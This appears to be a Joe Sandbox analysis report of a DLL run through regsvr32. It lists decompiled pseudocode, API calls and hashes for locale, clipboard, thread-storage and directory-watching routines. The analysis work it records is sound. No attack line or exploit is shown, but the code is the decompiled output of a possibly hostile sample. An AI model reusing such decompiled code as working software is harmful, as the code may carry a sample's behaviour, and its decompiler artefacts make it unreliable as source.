                                                                                                                					_t176 = 0;
                                                                                                                					if( *(_t181 - 0x10) <= _t169) {
                                                                                                                						L23:
                                                                                                                						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                                						E1002590C(_t181 - 0x3c);
                                                                                                                						_t92 = _t169;
                                                                                                                						goto L24;
                                                                                                                					} else {
                                                                                                                						while(1) {
                                                                                                                							_t94 = E1002583F(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
                                                                                                                							if(_t94 != _t169) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t176 =  &(1[_t176]);
                                                                                                                							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L23;
                                                                                                                						}
                                                                                                                						_t169 = _t94;
                                                                                                                						goto L23;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t92 = 0;
                                                                                                                					L24:
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                                					_pop(_t170);
                                                                                                                					_pop(_t177);
                                                                                                                					_pop(_t144);
                                                                                                                					return E1003B437(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                                				}
                                                                                                                			}

































                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025A81
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10025AA2
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10025AB3
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025AE9
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025AF1
                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10025B05
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025B29
                                                                                                                • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10025B2F
                                                                                                                • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10025B68
                                                                                                                • GetVersion.KERNEL32 ref: 10025B7D
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10025BA2
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 10025BC7
                                                                                                                • _sscanf.LIBCMT ref: 10025BE7
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025C1C
                                                                                                                • ConvertDefaultLocale.KERNEL32(72CDFFF6), ref: 10025C22
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10025C31
                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10025C41
                                                                                                                • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10025295,?), ref: 10025C5C
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025C8D
                                                                                                                • ConvertDefaultLocale.KERNEL32(72CDFFF6), ref: 10025C93
                                                                                                                • _memset.LIBCMT ref: 10025CAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 434808117-483790700
                                                                                                                • Opcode ID: b754e3d10a44b5231527069122ae48fa352d8e4aaaa7d0c4de87e4c91800891b
                                                                                                                • Instruction ID: a801d154cf97ba194fb9d738a532f5635c97861277f7c33abf18cda2bae62d62
                                                                                                                • Opcode Fuzzy Hash: b754e3d10a44b5231527069122ae48fa352d8e4aaaa7d0c4de87e4c91800891b
                                                                                                                • Instruction Fuzzy Hash: C8817EB5D0022D9FDB10DFA5EC84AFEBBF5EB48301F50052AE955E3280EB759A04CB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100385E2(intOrPtr* __ecx) {
                                                                                                                				intOrPtr* _t27;
                                                                                                                
                                                                                                                				_t27 = __ecx;
                                                                                                                				 *_t27 = RegisterClipboardFormatA("Native");
                                                                                                                				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
                                                                                                                				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
                                                                                                                				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                                                                                                                				return _t27;
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • RegisterClipboardFormatA.USER32(Native), ref: 100385F1
                                                                                                                • RegisterClipboardFormatA.USER32(OwnerLink), ref: 100385FA
                                                                                                                • RegisterClipboardFormatA.USER32(ObjectLink), ref: 10038604
                                                                                                                • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1003860E
                                                                                                                • RegisterClipboardFormatA.USER32(Embed Source), ref: 10038618
                                                                                                                • RegisterClipboardFormatA.USER32(Link Source), ref: 10038622
                                                                                                                • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1003862C
                                                                                                                • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 10038636
                                                                                                                • RegisterClipboardFormatA.USER32(FileName), ref: 10038640
                                                                                                                • RegisterClipboardFormatA.USER32(FileNameW), ref: 1003864A
                                                                                                                • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 10038654
                                                                                                                • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1003865E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFormatRegister
                                                                                                                • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                • API String ID: 1228543026-2889995556
                                                                                                                • Opcode ID: 1d3ef6582553aa21d58ef3369c5ac9c0c531466eba49a8f283764fcab4366065
                                                                                                                • Instruction ID: 5eacbbfad766d42ac76e24c0f8361814f61b6bfb24531249b0a3c5242fdecd40
                                                                                                                • Opcode Fuzzy Hash: 1d3ef6582553aa21d58ef3369c5ac9c0c531466eba49a8f283764fcab4366065
                                                                                                                • Instruction Fuzzy Hash: 6F0148749047985ACB30FFB69C08C8BBEE5EED46103024D2FE19987610E774D14ACF84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10042CC5(void* __ebx) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t7;
                                                                                                                				long _t10;
                                                                                                                				void* _t11;
                                                                                                                				int _t12;
                                                                                                                				void* _t18;
                                                                                                                				intOrPtr _t21;
                                                                                                                				long _t26;
                                                                                                                				void* _t30;
                                                                                                                				struct HINSTANCE__* _t37;
                                                                                                                				void* _t40;
                                                                                                                				void* _t42;
                                                                                                                
                                                                                                                				_t30 = __ebx;
                                                                                                                				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                				if(_t37 != 0) {
                                                                                                                					 *0x10070fc8 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                                					 *0x10070fcc = GetProcAddress(_t37, "FlsGetValue");
                                                                                                                					 *0x10070fd0 = GetProcAddress(_t37, "FlsSetValue");
                                                                                                                					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                                					__eflags =  *0x10070fc8;
                                                                                                                					_t40 = TlsSetValue;
                                                                                                                					 *0x10070fd4 = _t7;
                                                                                                                					if( *0x10070fc8 == 0) {
                                                                                                                						L6:
                                                                                                                						 *0x10070fcc = TlsGetValue;
                                                                                                                						 *0x10070fc8 = E10042948;
                                                                                                                						 *0x10070fd0 = _t40;
                                                                                                                						 *0x10070fd4 = TlsFree;
                                                                                                                					} else {
                                                                                                                						__eflags =  *0x10070fcc;
                                                                                                                						if( *0x10070fcc == 0) {
                                                                                                                							goto L6;
                                                                                                                						} else {
                                                                                                                							__eflags =  *0x10070fd0;
                                                                                                                							if( *0x10070fd0 == 0) {
                                                                                                                								goto L6;
                                                                                                                							} else {
                                                                                                                								__eflags = _t7;
                                                                                                                								if(_t7 == 0) {
                                                                                                                									goto L6;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t10 = TlsAlloc();
                                                                                                                					__eflags = _t10 - 0xffffffff;
                                                                                                                					 *0x1006dde8 = _t10;
                                                                                                                					if(_t10 == 0xffffffff) {
                                                                                                                						L15:
                                                                                                                						_t11 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					} else {
                                                                                                                						_t12 = TlsSetValue(_t10,  *0x10070fcc);
                                                                                                                						__eflags = _t12;
                                                                                                                						if(_t12 == 0) {
                                                                                                                							goto L15;
                                                                                                                						} else {
                                                                                                                							E10040E2D();
                                                                                                                							 *0x10070fc8 = E10042879( *0x10070fc8);
                                                                                                                							 *0x10070fcc = E10042879( *0x10070fcc);
                                                                                                                							 *0x10070fd0 = E10042879( *0x10070fd0);
                                                                                                                							 *0x10070fd4 = E10042879( *0x10070fd4);
                                                                                                                							_t18 = E10043128();
                                                                                                                							__eflags = _t18;
                                                                                                                							if(_t18 == 0) {
                                                                                                                								L14:
                                                                                                                								E100429AF();
                                                                                                                								goto L15;
                                                                                                                							} else {
                                                                                                                								_push(E10042B3B);
                                                                                                                								_t21 =  *((intOrPtr*)(E100428E5( *0x10070fc8)))();
                                                                                                                								__eflags = _t21 - 0xffffffff;
                                                                                                                								 *0x1006dde4 = _t21;
                                                                                                                								if(_t21 == 0xffffffff) {
                                                                                                                									goto L14;
                                                                                                                								} else {
                                                                                                                									_t42 = E10046749(1, 0x214);
                                                                                                                									__eflags = _t42;
                                                                                                                									if(_t42 == 0) {
                                                                                                                										goto L14;
                                                                                                                									} else {
                                                                                                                										_push(_t42);
                                                                                                                										_push( *0x1006dde4);
                                                                                                                										__eflags =  *((intOrPtr*)(E100428E5( *0x10070fd0)))();
                                                                                                                										if(__eflags == 0) {
                                                                                                                											goto L14;
                                                                                                                										} else {
                                                                                                                											_push(0);
                                                                                                                											_push(_t42);
                                                                                                                											E100429EC(_t30, _t37, _t42, __eflags);
                                                                                                                											_t26 = GetCurrentThreadId();
                                                                                                                											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                											 *_t42 = _t26;
                                                                                                                											_t11 = 1;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t11;
                                                                                                                				} else {
                                                                                                                					E100429AF();
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                			}
















                                                                                                                0x00000000
                                                                                                                0x10042e0b
                                                                                                                0x10042e0b
                                                                                                                0x10042e0c
                                                                                                                0x10042e20
                                                                                                                0x10042e22
                                                                                                                0x00000000
                                                                                                                0x10042e24
                                                                                                                0x10042e24
                                                                                                                0x10042e26
                                                                                                                0x10042e27
                                                                                                                0x10042e2e
                                                                                                                0x10042e34
                                                                                                                0x10042e38
                                                                                                                0x10042e3c
                                                                                                                0x10042e3c
                                                                                                                0x10042e22
                                                                                                                0x10042e09
                                                                                                                0x10042df5
                                                                                                                0x10042dd8
                                                                                                                0x10042d83
                                                                                                                0x10042e48
                                                                                                                0x10042cd7
                                                                                                                0x10042cd7
                                                                                                                0x10042cdf
                                                                                                                0x10042cdf

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1003CFA2,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042CCB
                                                                                                                • __mtterm.LIBCMT ref: 10042CD7
                                                                                                                  • Part of subcall function 100429AF: __decode_pointer.LIBCMT ref: 100429C0
                                                                                                                  • Part of subcall function 100429AF: TlsFree.KERNEL32(00000022,1003D03E,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 100429DA
                                                                                                                  • Part of subcall function 100429AF: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,1003D03E,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C), ref: 1004318C
                                                                                                                  • Part of subcall function 100429AF: DeleteCriticalSection.KERNEL32(00000022,?,00000001,1003D03E,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC), ref: 100431B6
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042CED
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042CFA
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042D07
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042D14
                                                                                                                • TlsAlloc.KERNEL32(?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042D64
                                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042D7F
                                                                                                                • __init_pointers.LIBCMT ref: 10042D89
                                                                                                                • __encode_pointer.LIBCMT ref: 10042D94
                                                                                                                • __encode_pointer.LIBCMT ref: 10042DA4
                                                                                                                • __encode_pointer.LIBCMT ref: 10042DB4
                                                                                                                • __encode_pointer.LIBCMT ref: 10042DC4
                                                                                                                • __decode_pointer.LIBCMT ref: 10042DE5
                                                                                                                • __calloc_crt.LIBCMT ref: 10042DFE
                                                                                                                • __decode_pointer.LIBCMT ref: 10042E18
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10042E2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                • API String ID: 4287529916-3819984048
                                                                                                                • Opcode ID: 330b7659c0cf517c1b391319ca8ecaf1eead31755eba3ee6cfc28da1b321ddf3
                                                                                                                • Instruction ID: f169a89df455118cb9e58d0714aa08d53c3bb3dbc95a3bfd64ba54b1ba44162f
                                                                                                                • Opcode Fuzzy Hash: 330b7659c0cf517c1b391319ca8ecaf1eead31755eba3ee6cfc28da1b321ddf3
                                                                                                                • Instruction Fuzzy Hash: 48317239A01321DAF760EF759C8560A3BA4EB44361B60073AF480F75B5DB79D8C1CB68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E10015540(void* __ebx, void* __edi) {
                                                                                                                				signed int __esi;
                                                                                                                				signed int _t207;
                                                                                                                				signed int _t209;
                                                                                                                				void* _t213;
                                                                                                                				void* _t221;
                                                                                                                				intOrPtr _t222;
                                                                                                                				signed int _t224;
                                                                                                                				intOrPtr _t229;
                                                                                                                				signed int _t230;
                                                                                                                				signed int _t247;
                                                                                                                				signed int _t249;
                                                                                                                				signed int _t251;
                                                                                                                				intOrPtr* _t259;
                                                                                                                				void* _t283;
                                                                                                                				void* _t285;
                                                                                                                				char _t292;
                                                                                                                				void* _t296;
                                                                                                                				signed int _t310;
                                                                                                                				char* _t327;
                                                                                                                				void* _t346;
                                                                                                                				signed int _t347;
                                                                                                                				signed int _t349;
                                                                                                                				intOrPtr _t350;
                                                                                                                				short* _t353;
                                                                                                                				void* _t354;
                                                                                                                				void* _t355;
                                                                                                                				signed int _t360;
                                                                                                                				intOrPtr _t362;
                                                                                                                				void* _t364;
                                                                                                                				signed int _t365;
                                                                                                                				void* _t367;
                                                                                                                				void* _t368;
                                                                                                                				void* _t371;
                                                                                                                				void* _t372;
                                                                                                                				void* _t373;
                                                                                                                
                                                                                                                				_t284 = __ebx;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10052952);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t365 = _t364 - 0x648;
                                                                                                                				_t207 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t365 + 0x644) = _t207 ^ _t365;
                                                                                                                				_push(__ebx);
                                                                                                                				_push(_t353);
                                                                                                                				_push(__edi);
                                                                                                                				_t209 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t209 ^ _t365);
                                                                                                                				 *[fs:0x0] = _t365 + 0x65c;
                                                                                                                				_t362 =  *((intOrPtr*)(_t365 + 0x66c));
                                                                                                                				 *(_t362 + 0x90) = 0;
                                                                                                                				_t213 = CreateFileA( *(_t362 + 0x78), 0xc0000000, 7, 0, 3, 0x2000000, 0);
                                                                                                                				 *(_t362 + 0xec) = _t213;
                                                                                                                				if(_t213 == 0xffffffff) {
                                                                                                                					L102:
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t365 + 0x65c));
                                                                                                                					_pop(_t346);
                                                                                                                					_pop(_t354);
                                                                                                                					_pop(_t285);
                                                                                                                					return E1003B437(0, _t285,  *(_t365 + 0x644) ^ _t365, _t325, _t346, _t354);
                                                                                                                				} else {
                                                                                                                					_t325 = _t365 + 0x344;
                                                                                                                					if(ReadDirectoryChangesW(_t213, _t365 + 0x344, 0x228, 1, 0x17f, _t365 + 0x50, 0, 0) != 0) {
                                                                                                                						do {
                                                                                                                							_t347 = WideCharToMultiByte;
                                                                                                                							E1003BB70(WideCharToMultiByte, _t365 + 0x22c, 0, 0x104);
                                                                                                                							_t367 = _t365 + 0xc;
                                                                                                                							_t327 =  *(_t365 + 0x340) >> 1;
                                                                                                                							WideCharToMultiByte(0, 0, _t367 + 0x34c, _t327, _t367 + 0x234, 0x63, 0, 0);
                                                                                                                							_t221 = 0;
                                                                                                                							do {
                                                                                                                								_t292 =  *((intOrPtr*)(_t367 + _t221 + 0x228));
                                                                                                                								 *((char*)(_t367 + _t221 + 0x124)) = _t292;
                                                                                                                								_t221 = _t221 + 1;
                                                                                                                							} while (_t292 != 0);
                                                                                                                							_t222 =  *((intOrPtr*)(_t367 + 0x32c));
                                                                                                                							if(_t222 != 0) {
                                                                                                                								_t355 = _t367 + _t222 + 0x338;
                                                                                                                								E1003BB70(WideCharToMultiByte, _t367 + 0x22c, 0, 0x104);
                                                                                                                								_t367 = _t367 + 0xc;
                                                                                                                								_t327 = _t367 + 0x234;
                                                                                                                								_t353 = _t355 + 0xc;
                                                                                                                								WideCharToMultiByte(0, 0, _t353,  *(_t355 + 8) >> 1, _t327, 0x63, 0, 0);
                                                                                                                								_t283 = 0;
                                                                                                                								do {
                                                                                                                									_t292 =  *((intOrPtr*)(_t367 + _t283 + 0x228));
                                                                                                                									 *((char*)(_t367 + _t283 + 0x554)) = _t292;
                                                                                                                									_t283 = _t283 + 1;
                                                                                                                								} while (_t292 != 0);
                                                                                                                							}
                                                                                                                							_t224 =  *((intOrPtr*)(_t367 + 0x330)) + 0xffffffff;
                                                                                                                							if(_t224 > 4) {
                                                                                                                								__eflags =  *(_t362 + 0x8c);
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L101;
                                                                                                                								} else {
                                                                                                                									_t229 = E1003CEA4(_t292, _t327, __eflags, 0);
                                                                                                                									_t368 = _t367 + 4;
                                                                                                                									 *((intOrPtr*)(_t368 + 0x38)) = _t229;
                                                                                                                									 *(_t368 + 0x3c) = _t327;
                                                                                                                									_t230 = E100173A6();
                                                                                                                									__eflags = _t230;
                                                                                                                									_t296 = 0 | _t230 != 0x00000000;
                                                                                                                									__eflags = _t296;
                                                                                                                									if(_t296 == 0) {
                                                                                                                										goto L103;
                                                                                                                									} else {
                                                                                                                										 *((intOrPtr*)(_t368 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)( *_t230 + 0xc))))() + 0x10;
                                                                                                                										_t335 = _t368 + 0x104;
                                                                                                                										 *((intOrPtr*)(_t368 + 0x66c)) = 5;
                                                                                                                										_t247 = E1003CBFC(_t284, _t368 + 0x104, _t368 + 0x104, _t368 + 0x38);
                                                                                                                										_t371 = _t368 + 8;
                                                                                                                										__eflags = _t247;
                                                                                                                										if(_t247 != 0) {
                                                                                                                											_t349 = _t347 | 0xffffffff;
                                                                                                                											__eflags = _t349;
                                                                                                                										} else {
                                                                                                                											_t349 =  *(_t371 + 0x100);
                                                                                                                										}
                                                                                                                										_t249 = E1003CBFC(_t284, _t335, _t371 + 0xe0, _t371 + 0x38);
                                                                                                                										_t372 = _t371 + 8;
                                                                                                                										__eflags = _t249;
                                                                                                                										if(_t249 != 0) {
                                                                                                                											_t360 = _t353 | 0xffffffff;
                                                                                                                											__eflags = _t360;
                                                                                                                										} else {
                                                                                                                											_t360 =  *(_t372 + 0xe0);
                                                                                                                										}
                                                                                                                										_t251 = E1003CBFC(_t284, _t372 + 0x38, _t372 + 0xbc, _t372 + 0x38);
                                                                                                                										_t373 = _t372 + 8;
                                                                                                                										__eflags = _t251;
                                                                                                                										if(_t251 != 0) {
                                                                                                                											_t252 = _t251 | 0xffffffff;
                                                                                                                											__eflags = _t251 | 0xffffffff;
                                                                                                                										} else {
                                                                                                                											_t252 =  *(_t373 + 0xc0);
                                                                                                                										}
                                                                                                                										_push(_t349);
                                                                                                                										_push(_t360);
                                                                                                                										E10003500(_t373 + 0x20, "%d:%d:%d", _t252);
                                                                                                                										_t367 = _t373 + 0x14;
                                                                                                                										_t353 = _t362 + 0x94;
                                                                                                                										E10026562(_t353, 1, 0,  *((intOrPtr*)(_t362 + 0x74)), 0, 0, 0, 0);
                                                                                                                										E1002637C(_t353, 0, 2, 0x10059ee0);
                                                                                                                										E1002637C(_t353, 0, 3, 0x10056948);
                                                                                                                										_t350 =  *((intOrPtr*)(_t367 + 0x14));
                                                                                                                										_t310 = _t353;
                                                                                                                										E1002637C(_t310, 0, 1, _t350);
                                                                                                                										_t259 = _t350 - 0x10;
                                                                                                                										 *((intOrPtr*)(_t367 + 0x664)) = 0xffffffff;
                                                                                                                										asm("lock xadd [edx], ecx");
                                                                                                                										__eflags = (_t310 | 0xffffffff) - 1;
                                                                                                                										goto L99;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								switch( *((intOrPtr*)(_t224 * 4 +  &M10015EA0))) {
                                                                                                                									case 0:
                                                                                                                										_t385 =  *((intOrPtr*)(_t362 + 0x7c));
                                                                                                                										if( *((intOrPtr*)(_t362 + 0x7c)) == 0) {
                                                                                                                											goto L101;
                                                                                                                										} else {
                                                                                                                											_t262 = E1003CEA4(_t292, _t327, _t385, 0);
                                                                                                                											_t374 = _t367 + 4;
                                                                                                                											 *((intOrPtr*)(_t374 + 0x30)) = _t262;
                                                                                                                											 *(_t374 + 0x34) = _t327;
                                                                                                                											_t263 = E100173A6();
                                                                                                                											_t296 = 0 | _t263 != 0x00000000;
                                                                                                                											if(_t296 == 0) {
                                                                                                                												goto L103;
                                                                                                                											} else {
                                                                                                                												 *((intOrPtr*)(_t374 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)( *_t263 + 0xc))))() + 0x10;
                                                                                                                												_t340 = _t374 + 0x50;
                                                                                                                												 *(_t374 + 0x66c) = 0;
                                                                                                                												_t267 = E1003CBFC(_t284, _t374 + 0x50, _t374 + 0x50, _t374 + 0x30);
                                                                                                                												_t375 = _t374 + 8;
                                                                                                                												if(_t267 != 0) {
                                                                                                                													_t351 = _t347 | 0xffffffff;
                                                                                                                													__eflags = _t351;
                                                                                                                												} else {
                                                                                                                													_t351 =  *(_t375 + 0x4c);
                                                                                                                												}
                                                                                                                												_t269 = E1003CBFC(_t284, _t340, _t375 + 0x74, _t375 + 0x30);
                                                                                                                												_t376 = _t375 + 8;
                                                                                                                												if(_t269 != 0) {
                                                                                                                													_t359 = _t353 | 0xffffffff;
                                                                                                                													__eflags = _t359;
                                                                                                                												} else {
                                                                                                                													_t359 =  *(_t376 + 0x74);
                                                                                                                												}
                                                                                                                												_t271 = E1003CBFC(_t284, _t376 + 0x30, _t376 + 0x98, _t376 + 0x30);
                                                                                                                												_t377 = _t376 + 8;
                                                                                                                												if(_t271 != 0) {
                                                                                                                													_t272 = _t271 | 0xffffffff;
                                                                                                                													__eflags = _t271 | 0xffffffff;
                                                                                                                												} else {
                                                                                                                													_t272 =  *(_t377 + 0x9c);
                                                                                                                												}
                                                                                                                												_push(_t351);
                                                                                                                												_push(_t359);
                                                                                                                												E10003500(_t377 + 0x20, "%d:%d:%d", _t272);
                                                                                                                												_t367 = _t377 + 0x14;
                                                                                                                												_t353 = _t362 + 0x94;
                                                                                                                												E10026562(_t353, 1, 0,  *((intOrPtr*)(_t362 + 0x74)), 0, 0, 0, 0);
                                                                                                                												_push(0x10059f24);
                                                                                                                												goto L21;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L107;
                                                                                                                									case 1:
                                                                                                                										__eflags =  *(__ebp + 0x80);
                                                                                                                										if(__eflags == 0) {
                                                                                                                											goto L101;
                                                                                                                										} else {
                                                                                                                											 *(__esp + 0x18) = E1003CEA4(__ecx, __edx, __eflags, 0);
                                                                                                                											 *((intOrPtr*)(__esp + 0x1c)) = __edx;
                                                                                                                											__eax = E100173A6();
                                                                                                                											__ecx = 0;
                                                                                                                											__eflags = __eax;
                                                                                                                											__ecx = 0 | __eax != 0x00000000;
                                                                                                                											__eflags = __ecx;
                                                                                                                											if(__ecx == 0) {
                                                                                                                												L103:
                                                                                                                												_t231 = E10001000(_t296, _t327, 0x80004005);
                                                                                                                												_push(0xf2100156);
                                                                                                                												 *_t231 =  *_t231 + _t327;
                                                                                                                												asm("in al, 0x5b");
                                                                                                                												 *_t231 =  *_t231 + _t327;
                                                                                                                												_pop(_t369);
                                                                                                                												_pop(_t328);
                                                                                                                												 *_t231 =  *_t231 + _t328;
                                                                                                                												asm("fistp word [eax+0x1]");
                                                                                                                												asm("adc ah, cl");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												asm("int3");
                                                                                                                												_push(0xffffffff);
                                                                                                                												_push(E10052988);
                                                                                                                												_push( *[fs:0x0]);
                                                                                                                												_push(_t296);
